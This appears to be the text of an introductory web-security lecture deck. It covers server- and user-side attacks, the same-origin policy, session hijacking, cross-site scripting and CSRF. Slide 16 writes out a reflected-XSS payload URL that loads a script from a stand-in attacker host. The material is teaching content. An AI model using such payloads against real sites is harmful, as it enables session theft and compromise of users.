  • 3. Goals: ● Web applications should guarantee the same security as the one required for standalone applications ● Web browsers should protect users in a way to avoid computer infections and sensitive data compromise Web Security
  • 4. Web Security Motivation : ● Most web sites have vulnerabilities ● Many users are not security minded ● Several components could be targeted ● Since many layers can be attacked, game over is often feasible
  • 5. Attacking The Server Typically, hackers can exploit injection flaws and other web application vulnerabilities: ● SQL Injection ● Command execution ● Local file access ● XML External Entities ● Web server exploits and misconfiguration ● Exposed administrative panels
  • 6. Attacking The Server Involved components: ● Web applications ● Web servers ● Web services ● Databases
  • 7. Attacking the users Typically, hackers can exploit web application vulnerabilities to attack users: ● Cross-Site Scripting ● Cross-Site Request Forgery ● UI Redressing ● Arbitrary URL redirects
  • 8. Attacking the users Possible goals: ● Impersonate users ● Privilege escalation ● Make victims trigger unwanted operations ● Credentials stealing via phishing
  • 9. Origin Policy Security principle that regulates web browser security: ● It restricts how a document loaded from A.com can interact with another document hosted on B.com ● A.com and B.com are considered as different origins, therefore they are isolated
  • 10. Origin Policy Example: ● The user is logged in sensi.tive.webm.ail.com ● The attacker may ask him to visit evil.com aiming towards stealing his session cookies for sensi.tive.webm.ail.com ● SOP prohibits such attempt resulting in a security exception
  • 11. Moving to web attacks ● HTTP requests containing malicious payloads could attack web applications ● Vulnerable web applications have weaknesses, whose exploitation could potentially lead to unexpected results ● Unpatched clients are potentially affected by several vulnerabilities Attack:
  • 12. Moving to web attacks ● Vulnerability detection is not trivial, at least for “uncommon” bugs ● Penetration testing is surely useful for spotting vulnerabilities, but it does guarantee completeness ● Protecting users requires several layers of protection both on the client and on the server side Defense:
  • 13. Session Hijacking This can take place through several ways: ● Predictable session tokens ● Cross-Site Scripting vulnerabilities ● Mixed content issues ● Session Fixation ● SOP bypass exploits ● Victim's computer malware infection
  • 14. Cross-Site Scripting ● Malicious HTML and/or JavaScript code is injected in the context of a target domain ● Since the browser have no way to distinguish whether a script is legit or not, it will execute it ● According to the SOP, the injected code will be executed in the context of the trusted web site
  • 15. Cross-Site Scripting Generally, Cross-Site Scripting (XSS) attacks are categorized in three categories: ● Reflected XSS ● Stored XSS ● DOM-Based XSS
  • 16. Reflected XSS • The attacker sends a specifically crafted link to the victim and asks him to visit it ● http://target/index.php?name=<script src=//ev.il.co.m/mal.js></script> • The victim clicks the malicious link pointing to http://target • The PHP page index.php echoes back the injected parameter • The script hosted on ev.il.co.m/mal.js is executed Exploitation Flow:
  • 17. Cross-Site Request Forgery ● Attack in which the victim is forced into making unwanted operations with respect to a web application, he is authenticated with ● The target of CSRF attacks are state-changing functionality ● The attack is feasible since the browser automatically appends cookies in HTTP • requests, also in the ones taking place cross-domain
  • 18. Thank You For Stay With Us